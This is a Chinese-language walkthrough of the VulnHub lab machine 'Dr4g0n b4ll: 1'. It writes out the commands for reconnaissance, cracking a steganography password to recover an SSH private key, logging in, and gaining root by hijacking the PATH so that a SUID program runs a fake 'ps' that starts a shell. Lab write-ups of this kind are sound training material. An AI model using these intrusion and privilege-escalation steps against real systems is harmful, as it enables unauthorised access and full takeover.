專案地址:Dr4g0n b4ll: 1 ~ VulnHub
前期資訊收集
使用Nmap 進行主機發現

使用Nmap 進行埠掃描

目標開啟ssh(22)、http(80)

在頁面源代碼中發現提示
多次base解碼后為 DRAGON BALL
使用Dirscan目錄掃描 發現robots.txt
base64解碼為 you find the hidden dir (找到隱藏的目錄)
根據前面原始碼提示 訪問http://192.168.234.157/DRAGON BALL/

secret.txt 里逐個測驗發現都無效;直接進入Vulnhub目錄
有張圖片和login.html

發現用戶名 xmen
將圖片下載到Kali
wget http://192.168.234.157/DRAGON%20BALL/Vulnhub/aj.jpg
圖片猜測為steg隱寫,使用 steghide 發現需要密碼
steghide extract -sf aj.jpg

網上收集一波資料發現可以使用 stegcracker 破解密碼

得到 id_rsa 結合前面收集的用戶xmen 可以嘗試ssh連接
賦予id_rsa 權限
chmod 600 id_rsa
ssh登錄
ssh xmen@192.168.234.157 -i id_rsa
可以發現一個Flag

提權
嘗試SUID提權
find / -perm -u=s -type f 2>/dev/null

發現家目錄下可疑檔案

執行shell檔案會運行ps
直接修改 環境變數

cd /tmp
echo "/bin/bash" > ps
chmod +x ps
export PATH=/tmp:$PATH
which ps
執行shell即可獲得Root權限

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/404064.html
標籤:其他
上一篇:攻防世界 簽到題
下一篇:web安全作業
